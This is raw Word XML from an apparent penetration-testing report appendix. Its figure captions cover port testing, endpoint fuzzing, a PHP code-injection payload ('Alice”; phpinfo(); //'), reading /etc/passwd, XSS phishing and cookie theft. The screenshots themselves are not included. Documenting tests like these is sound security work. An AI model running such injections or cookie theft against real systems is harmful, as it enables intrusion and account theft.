    <w:p w14:paraId="3F8BDAAB" w14:textId="266B6BBB"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"paragraph78"</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A.59</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 Test the HTTP Open Ports Locally</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="300"/>
    <w:p w14:paraId="719702A1" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4EBF76" w14:textId="77777777" w:rsidR="000224B3" w:rsidRPr="00D77DFE" w:rsidRDefault="000224B3" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2B5A88" w14:textId="67382AA8" w:rsidR="001B7354" w:rsidRDefault="000224B3" w:rsidP="001B7354">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7815C3C0" wp14:editId="4FA4605E">
            <wp:extent cx="4313207" cy="391602"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1490186132"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4369112" cy="396678"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB0C1F" w14:textId="423B11EC" w:rsidR="000224B3" w:rsidRPr="00D77DFE" w:rsidRDefault="000224B3" w:rsidP="000224B3">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67DFBECE" wp14:editId="3C24B4C8">
            <wp:extent cx="4235570" cy="1969226"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1123919920"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rotWithShape="1">
                    <a:blip r:embed="rId120">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="7975"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4241300" cy="1971890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB9BBB" w14:textId="0210B69C" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph79" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Figure A.60</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Test the Found Open Port 631</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="301"/>
    <w:p w14:paraId="08538960" w14:textId="77777777" w:rsidR="001B7354" w:rsidRDefault="001B7354" w:rsidP="00512AA9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466FC9ED" w14:textId="514CBF4B" w:rsidR="000224B3" w:rsidRPr="00D77DFE" w:rsidRDefault="000224B3"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65A357E5" wp14:editId="59775034">
            <wp:extent cx="4692770" cy="1854835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98549047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rotWithShape="1">
                    <a:blip r:embed="rId121">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="16718"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4750510" cy="1877657"/>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02" w:name="resource80"/>
    <w:p w14:paraId="2E247108" w14:textId="563A31B2"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"paragraph80"</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A.61</w:t>
      </w:r>
      <w:bookmarkEnd w:id="302"/>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 Test the Found Open Port 8081</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6847ED" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="000224B3">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13171CF7" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="000224B3">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BD744A" w14:textId="77777777" w:rsidR="001B7354" w:rsidRDefault="001B7354" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4DCD4B" w14:textId="288573F0" w:rsidR="00CE32E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00012E9D"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noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="032E6A06" wp14:editId="0021B766">
            <wp:extent cx="4037163" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="159276116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rotWithShape="1">
                    <a:blip r:embed="rId122">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="25229"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4037163" cy="218122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03" w:name="resource81"/>
    <w:p w14:paraId="75EF6A12" w14:textId="11916E42"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"paragraph81"</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A.62</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 fuzzing hidden directories and endpoints on port 8081</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="303"/>
    <w:p w14:paraId="3B16DA49" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00012E9D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5FA627" w14:textId="77777777" w:rsidR="00012E9D" w:rsidRPr="00D77DFE" w:rsidRDefault="00012E9D" w:rsidP="00736606">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="resource82"/>
    </w:p>
    <w:bookmarkEnd w:id="304"/>
    <w:p w14:paraId="2542469A" w14:textId="77777777" w:rsidR="00070A15" w:rsidRDefault="00070A15" w:rsidP="00012E9D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382BBDA3" w14:textId="7B19BBB0" w:rsidR="00012E9D" w:rsidRPr="00D77DFE" w:rsidRDefault="00012E9D" w:rsidP="00070A15">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1354D2E8" wp14:editId="5420AFDC">
            <wp:extent cx="2173856" cy="1991995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="62096994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rotWithShape="1">
                    <a:blip r:embed="rId67">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="59739"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2173856" cy="1991995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="042439EF" w14:textId="133F965F" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph82" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Figure A.63</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: test the found hidden endpoint on 8081</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A580A" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00012E9D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D60DA1" w14:textId="5AED332D" w:rsidR="0044517B" w:rsidRPr="00D77DFE" w:rsidRDefault="0044517B" w:rsidP="0044517B">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E5FF20E" wp14:editId="1C461D63">
            <wp:extent cx="4433977" cy="1411072"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="172931159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443742" cy="1414180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="305" w:name="resource83"/>
    <w:p w14:paraId="13305532" w14:textId="09787D6D"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"paragraph83"</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A.64</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>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 Testing Template Renderer page by payload a”//</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05202C70" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="0044517B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8B307C" w14:textId="22EC48C6" w:rsidR="0044517B" w:rsidRPr="00D77DFE" w:rsidRDefault="0044517B"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49D79565" wp14:editId="54154928">
            <wp:extent cx="4226778" cy="2536166"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="173764064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235882" cy="2541628"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="306" w:name="resource84"/>
    <w:p w14:paraId="3344FCC9" w14:textId="6E7079F0" w:rsidR="003A258B" w:rsidRDefault="007A78B0" w:rsidP="00512AA9">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"paragraph84"</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A.65</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>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Test the page by injecting php payload Alice”; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phpinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>); //</w:t>
      </w:r>
      <w:bookmarkStart w:id="307" w:name="resource85"/>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BB9C7" w14:textId="77777777" w:rsidR="00512AA9" w:rsidRPr="00512AA9" w:rsidRDefault="00512AA9" w:rsidP="00512AA9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="307"/>
    <w:p w14:paraId="037375E0" w14:textId="28ED4AEA" w:rsidR="003A258B" w:rsidRPr="00D77DFE" w:rsidRDefault="003A258B"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05DCD210" wp14:editId="469446CC">
            <wp:extent cx="4382219" cy="4656913"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="444614803"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4392261" cy="4667584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B3EE8C" w14:textId="6C02E6FE" w:rsidR="00070A15" w:rsidRDefault="007A78B0" w:rsidP="0027437D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph85" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.66</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Testing the payload to list /etc/passwd file from the server</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABDE6B" w14:textId="78D6E248" w:rsidR="003A258B" w:rsidRPr="00D77DFE" w:rsidRDefault="003A258B"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4B4762F3" wp14:editId="6EA631F1">
            <wp:extent cx="3217653" cy="696595"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="163475912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rotWithShape="1">
                    <a:blip r:embed="rId125">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="40407"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3217653" cy="696595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680FBA3" w14:textId="0E269FBD" w:rsidR="003A258B" w:rsidRPr="00D77DFE" w:rsidRDefault="003A258B" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>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13C5CE1D" wp14:editId="6DC5B09C">
            <wp:extent cx="3752490" cy="2674361"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="124670900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3763561" cy="2682251"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="308" w:name="resource86"/>
    <w:p w14:paraId="38B2CF55" w14:textId="46649363"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"paragraph86"</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A.67</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Simulation of phishing attack on search function on main page which vulnerable to XSS</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="308"/>
    <w:p w14:paraId="3FF57519" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="007A78B0">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF8FA79" w14:textId="03C46722" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00AB5D85" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783E03FD" wp14:editId="0F293CC9">
            <wp:extent cx="3795622" cy="3370216"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="203154842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3807139" cy="3380442"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="309" w:name="resource87"/>
    <w:p w14:paraId="7779D566" w14:textId="1B771336"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"paragraph87"</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A.68</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Stealing cookies using XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
